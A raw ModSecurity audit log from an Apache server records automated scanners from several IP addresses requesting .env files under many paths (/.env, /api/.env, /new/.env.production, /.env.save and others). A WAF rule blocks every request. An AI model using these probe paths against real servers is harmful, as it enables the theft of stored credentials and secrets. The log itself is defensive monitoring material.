Content-Type: text/html; charset=iso-8859-1
--e0dc292b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417775038473 634 (- - -)
Stopwatch2: 1745417775038473 634; combined=247, p1=214, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0dc292b-Z--
--0afdda78-A--
[23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PAAAABI 103.236.140.4 40070 103.236.140.4 8181
--0afdda78-B--
GET /env/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--0afdda78-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0afdda78-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417775204336 762 (- - -)
Stopwatch2: 1745417775204336 762; combined=335, p1=303, p2=0, p3=0, p4=0, p5=32, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0afdda78-Z--
--fbb29e23-A--
[23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PQAAABU 103.236.140.4 40072 103.236.140.4 8181
--fbb29e23-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--fbb29e23-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fbb29e23-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417775501491 632 (- - -)
Stopwatch2: 1745417775501491 632; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fbb29e23-Z--
--91cfff69-A--
[23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PgAAABg 103.236.140.4 40078 103.236.140.4 8181
--91cfff69-B--
GET /app/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--91cfff69-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--91cfff69-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417775667511 660 (- - -)
Stopwatch2: 1745417775667511 660; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--91cfff69-Z--
--d2fb4e2f-A--
[23/Apr/2025:21:16:15 +0700] aAj2LxuwXEWV6ydgl517PwAAAAU 103.236.140.4 40080 103.236.140.4 8181
--d2fb4e2f-B--
GET /dev/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--d2fb4e2f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d2fb4e2f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417775903951 651 (- - -)
Stopwatch2: 1745417775903951 651; combined=230, p1=193, p2=0, p3=0, p4=0, p5=37, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d2fb4e2f-Z--
--9bd86d1c-A--
[23/Apr/2025:21:16:16 +0700] aAj2MDI97BrbgvDq16RQvQAAAMs 103.236.140.4 40082 103.236.140.4 8181
--9bd86d1c-B--
GET /new/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--9bd86d1c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9bd86d1c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417776069828 742 (- - -)
Stopwatch2: 1745417776069828 742; combined=265, p1=219, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9bd86d1c-Z--
--32fbe004-A--
[23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QAAAABE 103.236.140.4 40088 103.236.140.4 8181
--32fbe004-B--
GET /new/.env.local HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--32fbe004-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--32fbe004-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417776346466 692 (- - -)
Stopwatch2: 1745417776346466 692; combined=309, p1=275, p2=0, p3=0, p4=0, p5=34, sr=109, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--32fbe004-Z--
--bb91514a-A--
[23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QQAAABY 103.236.140.4 40090 103.236.140.4 8181
--bb91514a-B--
GET /new/.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--bb91514a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bb91514a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417776512449 681 (- - -)
Stopwatch2: 1745417776512449 681; combined=298, p1=266, p2=0, p3=0, p4=0, p5=32, sr=103, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bb91514a-Z--
--1d4e3524-A--
[23/Apr/2025:21:16:16 +0700] aAj2MBuwXEWV6ydgl517QgAAAAM 103.236.140.4 40092 103.236.140.4 8181
--1d4e3524-B--
GET /new/.env.staging HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--1d4e3524-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1d4e3524-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417776697243 636 (- - -)
Stopwatch2: 1745417776697243 636; combined=261, p1=230, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1d4e3524-Z--
--9a75514d-A--
[23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SQAAAAA 103.236.140.4 40116 103.236.140.4 8181
--9a75514d-B--
GET /awstats/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--9a75514d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a75514d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417778195449 660 (- - -)
Stopwatch2: 1745417778195449 660; combined=269, p1=237, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a75514d-Z--
--fa18f33e-A--
[23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SgAAAAE 103.236.140.4 40118 103.236.140.4 8181
--fa18f33e-B--
GET /conf/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--fa18f33e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fa18f33e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417778361461 613 (- - -)
Stopwatch2: 1745417778361461 613; combined=251, p1=221, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fa18f33e-Z--
--a472310c-A--
[23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517SwAAAA8 103.236.140.4 40120 103.236.140.4 8181
--a472310c-B--
GET /cron/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--a472310c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a472310c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417778576168 626 (- - -)
Stopwatch2: 1745417778576168 626; combined=263, p1=232, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a472310c-Z--
--6d7b726f-A--
[23/Apr/2025:21:16:18 +0700] aAj2MhuwXEWV6ydgl517TAAAAAk 103.236.140.4 40122 103.236.140.4 8181
--6d7b726f-B--
GET /www/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--6d7b726f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6d7b726f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417778741992 679 (- - -)
Stopwatch2: 1745417778741992 679; combined=262, p1=232, p2=0, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6d7b726f-Z--
--d5093154-A--
[23/Apr/2025:21:32:42 +0700] aAj6Cj1ahuoJLEjKiAUe8AAAAJY 103.236.140.4 54214 103.236.140.4 8181
--d5093154-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--d5093154-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d5093154-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745418762499010 811 (- - -)
Stopwatch2: 1745418762499010 811; combined=328, p1=293, p2=0, p3=0, p4=0, p5=35, sr=93, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d5093154-Z--
--d2783f1e-A--
[23/Apr/2025:21:32:43 +0700] aAj6CxuwXEWV6ydgl51-aQAAAAg 103.236.140.4 54224 103.236.140.4 8181
--d2783f1e-B--
GET /api/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--d2783f1e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d2783f1e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745418763816851 846 (- - -)
Stopwatch2: 1745418763816851 846; combined=327, p1=287, p2=0, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d2783f1e-Z--
--1937cc00-A--
[23/Apr/2025:21:32:45 +0700] aAj6DTI97BrbgvDq16RTZgAAANU 103.236.140.4 54242 103.236.140.4 8181
--1937cc00-B--
GET /.env.save HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--1937cc00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1937cc00-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745418765137858 777 (- - -)
Stopwatch2: 1745418765137858 777; combined=290, p1=253, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1937cc00-Z--
--d9e0af30-A--
[23/Apr/2025:21:32:46 +0700] aAj6DtIw_rqnm4P5_ae3TgAAAFA 103.236.140.4 54264 103.236.140.4 8181
--d9e0af30-B--
GET /.env.prod HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--d9e0af30-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d9e0af30-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745418766451299 834 (- - -)
Stopwatch2: 1745418766451299 834; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d9e0af30-Z--
--315d6738-A--
[23/Apr/2025:21:32:57 +0700] aAj6GRuwXEWV6ydgl51-bQAAABA 103.236.140.4 54462 103.236.140.4 8181
--315d6738-B--
GET /dev/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--315d6738-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--315d6738-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745418777124590 799 (- - -)
Stopwatch2: 1745418777124590 799; combined=301, p1=267, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--315d6738-Z--
--5d13f715-A--
[23/Apr/2025:21:32:58 +0700] aAj6GhuwXEWV6ydgl51-bwAAAAA 103.236.140.4 54476 103.236.140.4 8181
--5d13f715-B--
GET /application/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 170.39.218.52
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 170.39.218.52
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--5d13f715-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5d13f715-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745418778435978 867 (- - -)
Stopwatch2: 1745418778435978 867; combined=369, p1=337, p2=0, p3=0, p4=0, p5=31, sr=139, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5d13f715-Z--
--a39cb55f-A--
[23/Apr/2025:22:17:41 +0700] aAkElTI97BrbgvDq16RcrgAAANc 103.236.140.4 37162 103.236.140.4 8181
--a39cb55f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15
Accept-Charset: utf-8
--a39cb55f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a39cb55f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745421461991897 902 (- - -)
Stopwatch2: 1745421461991897 902; combined=322, p1=271, p2=0, p3=0, p4=0, p5=51, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
